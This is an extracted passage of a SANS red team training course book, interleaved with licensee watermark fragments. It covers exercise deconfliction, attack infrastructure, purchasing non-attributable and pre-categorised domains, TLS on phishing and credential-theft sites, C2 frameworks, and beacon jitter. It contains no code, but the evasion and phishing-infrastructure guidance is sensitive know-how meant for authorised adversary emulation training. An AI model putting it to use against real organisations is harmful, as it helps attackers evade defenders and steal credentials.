© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Deconfliction

090aff33bcb6e401ded410120bc9a268 • Deconfliction is the process of separating Red Team activity from malicious activity • Requires coordination with Project Manager and Trusted Agents

26 ,2 02 0

– Daily Communications! – Consider having a training session with all Trusted Agents prior to start

• Blue Team reports new incidents and investigations • Red Team Lead (Trusted Agent) confirms if any are Red Team activity

[email protected] Ap ril

– Important reason why Red Team needs to log everything

• Ad-hoc questions may come during the exercise:

> m

co

Deconfliction is NOT to be used as a Red Team identification process

o.



– “Is this a Red Team Exercise” – Follow the Rules of Engagement

SEC564 | Red Team Exercises and Adversary Emulation

81

ak

er

@ ya

ho

22829180 i< an

nm

Deconfliction Throughout the course of a Red Team Exercise, the target organization may be attacked by a real adversary. The Blue Team will not know what attack is from a real adversary and which one is from the Red Team. Deconfliction is the process of separating Red Team activity from this possible, real malicious activity. This requires coordination with Project Manager and Trusted Agents and generally done through the daily communication. It is a good idea to have a training session with all trusted agents before the start of the exercise to cover the deconfliction process.

az

ze

Lincoln Mazzei nc o

ln

M

The way it should work is the Blue Team reports new incidents and investigations and the Red Team Lead (Trusted Agent) confirms if any of those events/incidents is Red Team activity. This a main reason the Red Team should log everything.

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK To :

Li

Deconfliction is NOT to be used as a Red Team identification process

Li

ce

ns

ed

Reference: https://www.mitre.org/sites/default/files/publications/pr_14-3929-cyber-exercise-playbook.pdf

live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

81

© SANS Institute 2020 De-Chaining

090aff33bcb6e401ded410120bc9a268 Concept of simulating a tactic or technique that is blocked 26 ,2 02 0

• Breaking the kill chain at any link should stop an attacker • If the Blue Team is prevention or detecting and mitigating an attack, the Red Team may get “stuck” on a certain tactic • De-chaining allows the Red Team to continue the test

Ap ril

[email protected] o.

co

m

>

– Document that “win” for target organization – Simulate the tactic or technique and continue testing

SEC564 | Red Team Exercises and Adversary Emulation

82

ak

er

@ ya

ho

22829180 i< an

nm

De-Chaining The initial concept of the Lockheed Martin Cyber Kill Chain was that if a defender could break and part of the chain, the adversary would be unsuccessful. The term de-chaining comes from that concept to ensure the exercise keeps moving forward. If the blue team is able to break the Red Team’s chain, then that particular tactic or technique can be simulated so the Red Team can continue. For example, if Blue Team continually blocks or kills the Red Teams command and control channel, the Red Team can note the detective and preventive measure while asking the Blue Team to whitelist the Red Team IP address to continue the test.

M

az

ze

Lincoln Mazzei nc o

ln

This should be discussed prior to an exercise starting and not when it occurs during the test. Reference:

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

ed

To :

Li

https://www.gfma.org/correspondence/gfma-framework-for-the-regulatory-use-of-penetration-testing-in-the-financial-servicesindustry/ https://en.wikipedia.org/wiki/Kill_chain

live

82

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Breach Notification or “Inject”

090aff33bcb6e401ded410120bc9a268 WHAT IF

26 ,2 02 0

Red Team is not caught?

(Inject)

[email protected] o.

co

m

>

Ap ril

Adversary Emulations test people, process, and technology. Response and Analysis is important. Inject a breach notification from a Threat Intel provider to measure.

SEC564 | Red Team Exercises and Adversary Emulation

83

ak

er

@ ya

ho

22829180 i< an

nm

Breach Notification or “Inject” As you recall, one of the goals of a Red Team Exercise is to measure the response of the people and process. If the Red Team reaches the objective early or if response for certain TTPs were not correctly measured, an inject or breach notification can be used. An inject relies on the organization’s standard processes of receiving Threat Intelligence. The Red Team with other Trusted Agents will choose one or more IoCs leveraged by the Red Team to send to Blue Team to measure. As soon as the IoC is provided, following standard process for that organization, the Project Manager and Blue Team Trusted Agent count the time it takes to go through the entire process.

M

az

ze

Lincoln Mazzei nc o

ln

Burn yourself? This action will surely burn some attack infrastructure and any lateral movement provided through the IoCs. This should be done once the objective was reached or to an area of the breach that the Red Team no longer requires. If all access is burned/lost, then the Red Team may use a white card to obtain similar access again.

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

ed

Reference: https://www.us-cert.gov/ncas/analysis-reports/AR18-275A

live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

83

© SANS Institute 2020 Pausing or Ending an Exercise

090aff33bcb6e401ded410120bc9a268 • With good planning, the only reason 26 ,2 02 0

for a pause or stop of an exercise should be a real breach that requires all hands • Leverage daily communication to avoid pausing • Report:

> m co o.

Interesting results or observations Daily Red Team Activities Daily Blue Team Activities and Incidents Deconfliction

ho

22829180

SEC564 | Red Team Exercises and Adversary Emulation

84

ak

er

@ ya

– – – –

Ap ril

[email protected]

i< an

nm

Pausing or Ending an Exercise With good planning, the only reason for a pause or stop of an exercise should be a real breach that requires all hands. If the planning was not done correctly, then exercises may be paused or stopped for many other reasons.

Lincoln Mazzei ln

M

Interesting results or observations Daily Red Team Activities Daily Blue Team Activities and Incidents Deconfliction

nc o

• • • •

az

ze

As covered in the Daily Communication slide, leverage daily communication to avoid pausing. At a minimum, the below should be constantly communicated between Trusted Agents:

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

84

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Course Roadmap

Attack Infrastructure

090aff33bcb6e401ded410120bc9a268 Defining Terms Motivation and Introduction Frameworks and Methodologies Threat Intelligence Lab 1.1: Consuming Threat Intelligence Planning Roles and Responsibilities Rules of Engagement Attack Infrastructure Lab 1.2: Attack Infrastructure Exercise Execution Reconnaissance Social Engineering Lab 1.3: Recon and Social Engineering Weaponization Delivery Lab 1.4: C2 and Weaponization

26 ,2 02 0

• Day 1: Introduction and Planning of Red Team Exercises • Day 2: Red Team Exercise Execution and Closure

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

85

ak

er

@ ya

ho

22829180 i< an

nm

This page intentionally left blank.

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

85

© SANS Institute 2020 Red Team Planning

– Fill any planning gaps – Attack Infrastructure/C2 – Reconnaissance – Social Engineering – Weaponization

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268 • Red Team Planning Threat Intelligence

Closure

• • Network Propagation • Action on Objectives

Planning

o.

co

m

>

Testing

Ap ril

[email protected] Initial Access/Foothold SEC564 | Red Team Exercises and Adversary Emulation

86

ak

er

@ ya

ho

22829180 i< an

nm

Red Team Planning At this point, all non-technical planning should be completed. The next steps are performed by the Red Team as part of their planning. Some frameworks/methodologies put these steps on the “Testing” Phase while others have this phase as “Planning” for the Red Team to complete. Regardless of the framework, Red Team Planning needs to occur to successfully execute a Red Team Exercise.



M

ln



Fill any planning gaps: Surely there will be gaps in the Threat Intelligence or planning that the Red Team will need to account for. Attack Infrastructure: Setting up Internet Attack Infrastructure requires ~30 days of time to setup and obtain reputation for the domains. Reconnaissance: This will depend on the Threat Intelligence as well. Red Team Reconnaissance is focused on specific items to obtaining initial access/foothold. Social Engineering: Depending on the Threat Intelligence and TTPs being emulated, Social Engineering may need to be performed and will require planning to be successful. Weaponization: Along with Attack Infrastructure setup, this technical part is required by the Red Team to create payloads and document the Indicators of Compromise that the attack will have.

nc o



az

ze

Lincoln Mazzei

Li

ce

ns



ed



To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

86

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 PRE-ATT&CK: Red Team Planning Framework

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

87

ak

er

@ ya

ho

22829180 i< an

nm

PRE-ATT&CK MITRE has created the PRE-ATT&CK Framework for tactics performed during the planning phase. These are a good reference for the Project Management team to assign and ensure the relevant areas are completed by the respective responsible team (e.g. Threat Intelligence, Planning, and/or Red Team). It is also a great reference for the Red Team to fill any gaps not completed by the Planning Phase.

az

ze

Lincoln Mazzei



nc o

ln

M

The MITRE PRE-ATT&CK Matrix™ is an overview of the tactics and techniques described in the PRE-ATT&CK model. It visually aligns individual techniques under the tactics in which they can be applied. Some techniques span more than one tactic because they can be used for different purposes. Priority Definition Planning: Process of determining the set of Key Intelligence Topics (KIT) or Key Intelligence Questions (KIQ) required for meeting key strategic, operational, or tactical goals. Leadership outlines the priority definition (may be considered a goal) around which the adversary designs target selection and a plan to achieve. Priority Definition Direction: Process of collecting and assigning requirements for meeting Key Intelligence Topics (KIT) or Key Intelligence Questions (KIQ) as determined by leadership. Target Selection: Consists of an iterative process in which an adversary determines a target by first beginning at the strategic level and then narrowing down operationally and tactically until a specific target is chosen. Technical Information Gathering: Process of identifying critical technical elements of intelligence an adversary will need about a target in order to best attack. People Information Gathering: Process of identifying critical personnel elements of intelligence an adversary will need about a target in order to best attack. Organizational Information Gathering: Process of identifying critical organizational elements of intelligence an adversary will need about a target in order to best attack. Technical Weakness Identification: Identifying and analyzing weaknesses and vulnerabilities collected during the intelligence gathering phases to determine best approach based on technical complexity and adversary priorities.

ns

Li



ce



ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK • • • •

live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

87

© SANS Institute 2020 • •

People Weakness Identification: Identifying and analyzing weaknesses and vulnerabilities from the intelligence gathering phases, which can be leveraged to gain access to target or intermediate target persons of interest or social trust relationships. Organizational Weakness Identification: Identifying and analyzing weaknesses and vulnerabilities from the intelligence gathering phases, which can be leveraged to gain access to target or intermediate target organizations of interest. Adversary OPSEC: Of various technologies or third-party services to obfuscate, hide, or blend in with accepted network traffic or system behavior. Establish & Maintain Infrastructure: Building, purchasing, co-opting, and maintaining systems and services used to conduct cyber operations. Persona Development: Development of public information, presence, history and appropriate affiliations. Build Capabilities: Developing and/or acquiring the software, data and techniques used at different phases of an operation. Test Capabilities: Takes place when adversaries may need to test capabilities externally to refine development goals and criteria and to ensure success during an operation. Stage Capabilities: Preparing operational environment required to conduct the operation.

• • • •

m

>



[email protected] Ap ril



26 ,2 02 0

090aff33bcb6e401ded410120bc9a268

o.

co

Reference: https://attack.mitre.org/tactics/pre/

i< an

nm

ak

er

@ ya

ho

22829180

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

88

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 ATT&CK TA0022

Attack Infrastructure

TM

090aff33bcb6e401ded410120bc9a268 Red Team is responsible for setting up infrastructure to emulate TTPs of the adversary

• Confirm reputation and categorization of all domain and IPs • Set up Long and Short Haul C2 infrastructure • Configure custom C2 tooling • Test external C2 communication schemes

26 ,2 02 0

• Choose and procure external hosting service providers • Purchase domain names • Generate domain certificates • Set up mail servers • Set up phishing and credential theft sites

o.

co

m

>

Ap ril

[email protected]

SEC564 | Red Team Exercises and Adversary Emulation

89

ak

er

@ ya

ho

22829180 i< an

nm

Attack Infrastructure Red Team is responsible for setting up infrastructure to emulate TTP’s of designated threat actors. Given the time all of these steps take, it is recommended to begin setting up infrastructure as early as possible. Red Team infrastructure should never be used for more than one exercise.

ze

Lincoln Mazzei nc o

ln

M

az

Here is another example of the Chicken and Egg problem with Preparation Phase and Threat Intelligence phase. The Red Team needs to begin setting up attack infrastructure on the internet with at least 30 days of anticipation of the start of the exercise. Without the Threat Intelligence to know what adversary and TTPs will be emulated, the Red Team cannot set up the entire attack infrastructure. Items to consider based on Planning and Threat Intelligence:

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK • • • • • •

To :

ed

ns



ce



Choose and procure external hosting service providers: Digital Ocean, Namecheap, Amazon AWS, there are many Purchase domain names: Not very expensive. Ensure they are not attributable back to you or anyone in your organization. Consider paying a little extra for privacy blocking of whois data. Generate domain certificates: Always use encrypted channels unless the TTP is specifically over nonencrypted protocols. Set up mail servers: If you will be doing phishing, you need email servers. Email servers need to have some sort of decent reputation to get your emails routed through organization email gateways. Set up phishing and credential theft sites: Based on the Threat Intelligence, you may need to do phishing with links to malicious payloads or sites that steal credentials. Confirm reputation and categorization of all domain and IPs: Typical controls look at blacklists and domain reputation to block traffic or email. Set up Long and Short Haul C2 infrastructure: Will cover this in command and control section. Configure custom C2 tooling: Will cover this in command and control section. Test external C2 communication schemes: Test everything before sending to targets.

Li



live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

89

© SANS Institute 2020 Consider building a redundant and robust attack infrastructure as domains and systems will be burned during the exercise. The Blue Team is expected to detect and contain the attack, which would result in domains and IP addresses being blocked. We will cover some techniques to get around this shortly.

090aff33bcb6e401ded410120bc9a268 26 ,2 02 0

References: https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki https://attack.mitre.org/tactics/TA0022/ https://attack.mitre.org/tactics/TA0025 https://attack.mitre.org/tactics/TA0026

o.

co

m

>

Ap ril

[email protected]

i< an

nm

ak

er

@ ya

ho

22829180

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

90

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 ATT&CK TA0024

Attack Infrastructure: Baseline

TM

090aff33bcb6e401ded410120bc9a268 Create a baseline of your attack infrastructure that can be easily deployed in multiple environments

26 ,2 02 0

• Software – Windows or Linux? Both – Attack Tools • Hardware – Virtual Machines or Images • Network infrastructure – Consider Cloud Providers

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

91

ak

er

@ ya

ho

22829180 i< an

nm

Attack Infrastructure: Baseline As Red Team Exercises are generally done in teams of 2-5, it is important to establish a baseline of all your tools for consistency across the team members. Create a baseline of your attack infrastructure that can be easily deployed in multiple environments. Based on the Adversary Emulation model, the attack may begin from the internet or it can be “assumed breach” requiring internal infrastructure.

az

ze

Lincoln Mazzei nc o

ln

M

It is recommended to have a consistent Linux and Windows build to deploy. Most tools required will work on one or the other. Apple products may be used as long as virtualization is leveraged to run the other operating systems. Create a base image of Windows and a base image of Linux. This will allow consistency across testers. Virtual Machines can be moved easily across physical systems like Laptops and Servers as well as cloud providers. Other options observed is the use of containers to deploy the base tools.

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

ed

To :

References: https://attack.mitre.org/tactics/TA0024/ https://attack.mitre.org/techniques/T1347/

live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

91

© SANS Institute 2020 Attack Infrastructure: Software

included in the USB drive provided with the course, includes a toolbox to get you started • Other virtual machines can also be helpful

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268 • The SANS Slingshot VM, Ap ril

[email protected] co

m

>

– Kali Linux by Offensive Security – Commando VM from Mandiant

o.

• Create your own

SEC564 | Red Team Exercises and Adversary Emulation

92

ak

er

@ ya

ho

22829180 i< an

nm

Attack Infrastructure: Software First, you need software for your testing regimen. With this course, you received a copy of the SANS Slingshot image, which is full of tools used in various assessments. Furthermore, this VMware image includes tools preinstalled, and in many cases, preconfigured so that you can apply them directly in your own testing.

ze

Lincoln Mazzei nc o

ln

M

az

Another useful source of tools are the bootable Linux distributions various people have made freely available, loaded with useful assessment and attack tools. A solid set of tools is included in Kali Linux, created and maintained by Offensive Security. Numerous similar Linux images are also available, but Kali is one of the best because of its comprehensive set of tools, compatibility with a wide range of hardware, and carefully designed organization and layout.

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK To :

Li

Mandiant/FireEye has released a Windows Offensive Distribution called Commando VM.

ns

ed

As you gain experience performing Red Team exercises, you should create your own baseline and images. We will cover the requirements and features you will want to maintain on your own image.

Li

ce

References: https://www.kali.org/ https://www.fireeye.com/blog/threat-research/2019/03/commando-vm-windows-offensive-distribution.html

live

92

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Course Roadmap

Lab 1.2: Attack Infrastructure

090aff33bcb6e401ded410120bc9a268 Defining Terms Motivation and Introduction Frameworks and Methodologies Threat Intelligence Lab 1.1: Consuming Threat Intelligence Planning Roles and Responsibilities Rules of Engagement Attack Infrastructure Lab 1.2: Attack Infrastructure Exercise Execution Reconnaissance Social Engineering Lab 1.3: Recon and Social Engineering Weaponization Delivery Lab 1.4: C2 and Weaponization

26 ,2 02 0

• Day 1: Introduction and Planning of Red Team Exercises • Day 2: Red Team Exercise Execution and Closure

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

93

ak

er

@ ya

ho

22829180 i< an

nm

This page intentionally left blank.

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

93

© SANS Institute 2020 Click1.2 To| Edit Master Title Style Lab Attack Infrastructure

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268 Please work on the lab exercise Lab 1.2 | Attack Infrastructure

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

94

ak

er

@ ya

ho

22829180 i< an

nm

This page intentionally left blank.

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

94

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Attack Infrastructure: Open Source Adversary Emulation Tools

090aff33bcb6e401ded410120bc9a268 26 ,2 02 0

Metasploit is an exploitation framework used by virtually all penetration testers. It has both a free community edition and a commercial edition available. Its main focus is on “standardization” of exploit development and usage.

[email protected] o.

co

m

>

Ap ril

Empire is primarily a post-exploitation tool. It has both Windows support (using a pure PowerShell 2.0 agent) and Linux / OS X support (using a pure Python 2.6/2.7 agent). It is the result of the merger of PowerShell Empire and Python EmPyre!

SEC564 | Red Team Exercises and Adversary Emulation

95

ak

er

@ ya

ho

22829180 i< an

nm

Attack Infrastructure: Open Source Adversary Emulation Tools Red Team Adversary Emulation tools are similar to some of the tools used in Penetration Testing but allow for more robust lateral movement and command and control. Two common open source tools:

Lincoln Mazzei ln

M

az

ze

Metasploit An exploitation framework used by virtually all penetration testers. It has both a free community edition and a commercial edition available. Its main focus is on “standardization” of exploit development and usage. Rarely used by Red Team and covered extensively in other SANS Penetration Testing courses.

nc o

Empire Primarily a post-exploitation tool. It has both Windows support (using a pure PowerShell2.0 agent) and Linux / OS X support (using a pure Python 2.6/2.7 agent). It is the result of the merger of PowerShell Empire and Python EmPyre! Uses beaconing for Command and Control.

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

ed

SANS Course: SANS SEC580: Metasploit Kung Fu for Enterprise Pen Testing https://www.sans.org/course/metasploit-kung-fu-enterprise-pen-testing

live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

95

© SANS Institute 2020 Attack Infrastructure: Commercial Adversary Emulation Tools

090aff33bcb6e401ded410120bc9a268 26 ,2 02 0

Cobalt Strike is an adversary emulation tool to execute targeted attacks against modern enterprises. Many customizable features for Red Team Exercises and Adversary Emulation including C2 profiles.

[email protected] o.

co

m

>

Ap ril

Innuendo is a sophisticated post-compromise implant framework that models advanced C2 and data exfiltration attacks. The philosophy behind INNUENDO is simple: To find the real thing, you have to calibrate your detection tools and teams with the real thing.

SEC564 | Red Team Exercises and Adversary Emulation

96

ak

er

@ ya

ho

22829180 i< an

nm

Attack Infrastructure: Commercial Adversary Emulation Tools Commercial Adversary Emulation Tools exist as well. The industry’s most commonly used commercial tool is Cobalt Strike. Immunity has an implant framework as well for post-exploitation work.

Lincoln Mazzei M

az

ze

Cobalt Strike Adversary emulation tool to execute targeted attacks against modern enterprises. Many customizable features for Red Team Exercises and Adversary Emulation including C2 profiles.

nc o

ln

Immunity Innuendo Innuendo is a sophisticated post-compromise implant framework that models advanced data exfiltration attacks on your enterprise. The philosophy behind INNUENDO is simple: To find the real thing, you have to calibrate your detection tools and teams with the real thing.

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

ed

References: https://www.cobaltstrike.com/ https://www.immunityinc.com/products/innuendo/

live

96

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 The C2 Matrix

090aff33bcb6e401ded410120bc9a268 Matrix of command and control frameworks for Red Teamers 26 ,2 02 0

Google doc of most C2 frameworks Documents various capabilities of each framework There is no right or wrong, better or worse framework Find ideal C2 for your current objective Wizard like UI to select which one www.thec2matrix.com

m

>

Ap ril

[email protected] o.

co

• • • • • •

SEC564 | Red Team Exercises and Adversary Emulation

97

ak

er

@ ya

ho

22829180 i< an

nm

The C2 Matrix With the original announcement that PowerShell Empire was no longer going to be supported, Jorge Orchilles set out to find the replacement for it. Empire was the standard for showing off how Command and Control (C2) frameworks work (especially in demos and classrooms). From beaconing, to operational security, to the mapping of ATT&CK in an adversary emulation plan, Empire was the go-to. The main goal of Empire was to showcase how attackers were leveraging PowerShell and that we needed to have detection against its use. As Empire has met its goal—the project is no longer maintained by the original creators.

M

az

ze

Lincoln Mazzei nc o

ln

The C2 Matrix is a working project to document all public command and control frameworks in a single place. As each Red Team objective is different, the command and control framework may need to be different as well. From choosing the target agents (Windows, macOS, Linux, etc.) to the communication channel, there are many options available for Red Teams to leverage and test Blue Teams with.

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

ed

Reference: https://www.thec2matrix.com/

live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

97

© SANS Institute 2020 ATT&CK T1329

Attack Infrastructure: Cloud Providers

TM

090aff33bcb6e401ded410120bc9a268 • Consider using cloud-based resources 26 ,2 02 0

– Make sure you verify in advance that the cloud provider allows it – More efficient to scale and obtain public IP addresses

• Larger cloud providers are generally trusted by organizations – Some target organizations are more likely to allow packets inbound from a cloud service provider address space, especially if they have assets on that cloud so that they won't (or can't) block access

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

98

ak

er

@ ya

ho

22829180 i< an

nm

Attack Infrastructure: Cloud Providers For emulating external adversaries, cloud providers may be the best use of resources due to all the benefits of cloud computing but particularly scale. With a baseline built, it is very easy to scale the infrastructure across cloud providers. It is also quick and easy to get new public IPs. In Adversary Emulation, you will get caught and some IPs and domains may get blocked.

az

ze

Lincoln Mazzei nc o

ln

M

Most organizations leverage cloud services or use services hosted on cloud services. By leveraging the same cloud environment, it will be harder for the Blue Team to monitor and block. Sometimes, as will be covered with Domain Fronting, it may be impossible to block the cloud provider. Our experience has shown success leveraging Amazon, Microsoft, Google, and Digital Ocean. There are many other providers available. Remember to use your own images as a baseline and not the builds of the provider as they are not trusted.

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

ed

Reference: https://attack.mitre.org/techniques/T1329/

live

98

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 ATT&CK T1328

Attack Infrastructure: Purchase Domains and Categorize

TM

090aff33bcb6e401ded410120bc9a268 • Direct access to IP Addresses is often blocked outbound – Register domains and categorize them – Purchase categorized domain names that have expired: • https://www.expireddomains.net/ • https://domainhuntergatherer.com/

26 ,2 02 0

• Some outbound proxies block domains based on categories

[email protected] o.

co

m

>

BrightCloud: https://www.brightcloud.com/tools/url-ip-lookup.php Fortiguard: https://fortiguard.com/webfilter McAfee: https://trustedsource.org/ Palo Alto Networks: https://urlfiltering.paloaltonetworks.com/query/ Symantec/Bluecoat WebPulse: http://sitereview.bluecoat.com/

ho

22829180

SEC564 | Red Team Exercises and Adversary Emulation

99

ak

er

@ ya

• • • • •

Ap ril

– Categorization sites:

i< an

nm

Purchase Domains and Categorization Getting access may seem difficult, but the outbound command and control is also important to focus on and prepare for during this phase.

Lincoln Mazzei ln

M

az

ze

Domains Most organizations do not allow outbound access directly to IP Addresses. If it is allowed, the Blue Team is most likely looking and will catch the Red Team easily. Therefore, it is important to purchase domain names, so the Command and Control channels blend in with real traffic and do not stand out for the Blue Team to catch.

nc o

Categorization Some organizations also block domains based on the category they have. There are multiple sites and services that do categorization. The Threat Intelligence or Recon Phase may disclose the service used by the target organization. • BrightCloud: https://www.brightcloud.com/tools/url-ip-lookup.php • Fortiguard: https://fortiguard.com/webfilter • McAfee: https://trustedsource.org/ • Palo Alto Networks: https://urlfiltering.paloaltonetworks.com/query/ • Symantec/Bluecoat WebPulse: http://sitereview.bluecoat.com/ • IBM xForce: https://exchange.xforce.ibmcloud.com/url/ • Cisco Talos: https://www.talosintelligence.com/reputation

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

It is a good practice to get the domains purchased for the exercise categorized as a category that may be allowed outbound and/or may not be decrypted. Categorizing a domain may take time as one must create a legit-looking site and leave it running for some time. Then go to each categorization vendor and submit a request. An efficient method around this is to purchase categorized domain names that have expired: • https://www.expireddomains.net/ • https://domainhuntergatherer.com/ References: Buy domain name: https://attack.mitre.org/techniques/T1328/ SSL certificate acquisition for domain: https://attack.mitre.org/techniques/T1337/ https://github.com/threatexpress/domainhunter © 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

99

© SANS Institute 2020 ATT&CK T1337

Attack Infrastructure: Digital Certificates

TM

090aff33bcb6e401ded410120bc9a268 Acquire TLS certificates for all domains 26 ,2 02 0

• Encrypt all Command and Control (C2) Communication • Provide TLS on phishing and credential stealing sites

Ap ril

[email protected] >

CONSIDER THIS

o.

co

m

People check if TLS is used before putting credentials on sites. This would burn your Attack Infrastructure!

SEC564 | Red Team Exercises and Adversary Emulation

100

ak

er

@ ya

ho

22829180 i< an

nm

Digital Certificates Similar to using IP Addresses for outbound Command and Control, if the Blue Team is looking at outbound traffic, cleartext command and control will be easy to spot and very poor operational security. Obtain TLS certificates for the domains purchased. Whether it is for stealing credentials or command and control, this is the best practice.

az

ze

Lincoln Mazzei nc o

ln

M

Consider This Red Team sends a spear phishing email to the target. The target falls for the social engineering attack and clicks on the link. The target visits a site that has a domain (an IP Address would be an immediate red flag for the target) but notices TLS is not used. The target becomes suspicious and reports the website and phishing email. Red Team infrastructure is burned: Mail infrastructure, target becomes suspicious for following attacks, domain, IP, and theme.

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

ed

Reference: SSL certificate acquisition for domain: https://attack.mitre.org/techniques/T1337/

live

100

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 ATT&CK TA0011

Attack Infrastructure: Command and Control

TM

090aff33bcb6e401ded410120bc9a268 • Influence an attacker has over • Interactive a compromised computer system that they control • Communication method attacker leverages to manipulate target systems • Many protocols

• Short Haul

26 ,2 02 0

– Highest risk of exposure – Similar to Metasploit Payloads – Plan to get caught and lose access

[email protected]

– HTTP(s), DNS, SMB, RDP, SSH, VPN, SMTP, etc.

m

>

• Long Haul

Ap ril

– Use Beacons (callbacks) – Callbacks in the 1–24 hr. range

co

– Callbacks ~12-24 hours – Add Jitter to avoid patterns

o.

• Plan for Short-Haul and Long-Haul C2

SEC564 | Red Team Exercises and Adversary Emulation

101

ak

er

@ ya

ho

22829180 i< an

nm

Attach Infrastructure: Command and Control The US Department of Defense Dictionary of Military and Associated Terms defines command and control as: "The exercise of authority and direction by a properly designated commander over assigned and attached forces in the accomplishment of the mission.” Also called C2. In information security, the term refers to the influence an attacker has over a compromised computer system that they control.

az

ze

Lincoln Mazzei nc o

ln

M

C2 Protocols Red Team can set up multiple protocols for Command and Control. HTTP and HTTPS is generally allowed outbound and will tie in with regular traffic. DNS is generally allowed outbound and may not be looked by Blue Teams. SMB internally is most likely not looked at given the amount of traffic most networks have. RDP, SSH, and VPN may be protocols used internally as well and difficult to spot as C2.

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK •

Li

ce

ns

ed

To :

Short-Haul and Long-Haul Short-haul servers are the servers used for day to day interaction. These servers will be burned frequently. The servers should check in much more frequently than the long-haul servers, but not interactively most of the time. Long-haul servers should be used only to regain access into the environment. The servers should receive callbacks from persistence and receive check-ins very slowly, such as one check-in per 12 hours. Interactive (Tier 3) • Highest risk of exposure: An interactive connection will stick out to the Blue Team • Metasploit payloads are interactive and should not be leveraged in adversary emulations • Plan to lose access: Blue Team may block these frequently Short Haul (Tier 2) • Beacons: These are callbacks from the target to Red Team C2. Each check-in can have a list of actions to perform. • Callbacks in the 1–24-hour range

live



© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

101

© SANS Institute 2020 •

Long Haul (Tier 1) • Set callbacks in 24+ hour range • Add Jitter to avoid patterns

090aff33bcb6e401ded410120bc9a268 26 ,2 02 0

Jitter is the introduction of randomness into the beacon timing. For a beacon that calls home every minute (60 seconds) you could introduce jitter by programming the payload to vary that timing by +/- 50%. So rather than calling home at specific 60 second intervals, the payload would call home at time intervals varying from 30 seconds to 90 seconds. Reference: https://attack.mitre.org/tactics/TA0011/

o.

co

m

>

Ap ril

[email protected]

i< an

nm

ak

er

@ ya

ho

22829180

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

102

